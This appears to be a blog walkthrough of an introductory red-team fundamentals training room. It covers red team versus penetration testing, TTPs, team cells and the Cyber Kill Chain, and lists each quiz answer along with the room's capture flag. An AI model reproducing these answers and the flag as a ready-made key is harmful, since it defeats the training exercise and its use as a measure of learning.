The first task in the series doesn’t require you to answer any questions. It is just an introduction in to the path and talks about some very basic principles of Red Team engagements. It explains that they are better than standard Penetration Tests and Vulnerability Assessments. Furthermore, the lab ends with just having to acknowledge that you have read the material.

Task 1 – Red Team Fundamentals

Task 2 – Vulnerability Assessment and Penetration Tests Limitations

The second task further elaborates on the differences between Penetration Tests, Vulnerability Assessments, and Red Team engagements. Furthermore, it goes on to talk about the constraints of Penetration Tests and Vulnerability Assessments. How things like time, budget, scope, disruption, and the heavy focus on technology limit the effectiveness of those tests.

Task 2 – Vulnerability Assessment and Penetration Tests Limitations

Question: Would vulnerability assessments prepare us to detect a real attacker on our networks? (Yay/Nay)

Answer: Nay

Question: During a penetration test, are you concerned about being detected by the client? (Yay/Nay)

Answer: Nay

Question: Highly organized groups of skilled attackers are nowadays referred to as …

Answer: Advanced Persistent Threats

Task 3 – Red Team Engagements

Task 3 goes on to talk about the engagements themselves and how they borrowed the name from the military. Furthermore, it introduces the terms Tactics, Techniques, and Procedures, or TTPs for short. It explains how the goal of an engagement is to capture the Crown Jewels or flags. Furthermore, it also explains how Red Team engagements cover more than just vulnerability scanning. It covers the technical infrastructure, social engineering, and physical intrusion such as turning up and trying to bypass on-site security. However, it doesn’t end there. Additionally, the author talks about the different types of exercises such as full engagement, assumed breach, and tabletop exercises.

Task 3 - Red Team Engagements
Task 3 – Red Team Engagements

Question: The goals of a red team engagement will often be referred to as flags or…

Answer: crown jewels

Question: During a red team engagement, common methods used by attackers are emulated against the target. Such methods are usually called TTP. What does TTP stand for?

Answer: Tactics, techniques, and procedures

Question: The main objective of a red team engagement is to detect as many vulnerabilities in as many hosts as possible (Yay/Nay)

Answer: Nay

Task 4 – Teams and Functions of an Engagement

The next task focuses on the structure of the different teams and the functions of the engagement. In reality, I believe that the desired structure of the team is seldom implemented. For example, it is more than likely that the team will consist of a Red Cell Lead and a Red Cell Operator. It would be desirable to have a Red Cell Assistant Lead but that often isn’t the case. As can be seen from the image below the author explains that there are three teams. The Red Team, the Blue Team, and the White Team. The Red Team is attacking, the blue team is defending (often without the knowledge of the attack) and the white team is playing middle man.

Task 4 - Teams and Functions of an Engagement
Task 4 – Teams and Functions of an Engagement

Question: What cell is responsible for the offensive operations of an engagement?

Answer: Red Cell

Question: What cell is the trusted agent considered part of?

Answer: White Cell

Task 5 – Engagement Structure

The objectives of task 5 are to educate the reader on the Cyber Kill Chain. As can be seen from the image below, the kill chain is made up of 7 different stages. Namely, recon, weaponization, delivery, exploitation, installation, command & control, and actions on objectives. Furthermore, it explains each of these stages and what their purpose is.

Task 5 - Engagement Structure
Task 5 – Engagement Structure

Question: If an adversary deployed Mimikatz on a target machine, where would they be placed in the Lockheed Martin cyber kill chain?

Answer: Installation

Question: What technique’s purpose is to exploit the target’s system to execute code?

Answer: Exploitation

Task 6 – Overview of a Red Team Engagement

Until now the tasks haven’t been very hands-on. However, this task asks you to assume the role of an attacker and walk through the different stages of an engagement. Furthermore, it has an interactive web application with great graphics that explains each step in detail. This is a really fun exercise, especially for those trying to build their technical skills.

Task 6 - Overview of a Red Team Engagement
Task 6 – Overview of a Red Team Engagement

Question: Click the “View Site” button and follow the example engagement to get the flag

Answer: THM{RED_TEAM_ROCKS}

Task 7 – Conclusion

Surely the room is harder than that? nope, that’s it. Once you have read through all that material and submitted your answers you’re done. Furthermore, you may be lucky enough to win some tickets for the competition which could allow you to net some swag.

Task 7 - Conclusion
Task 7 – Conclusion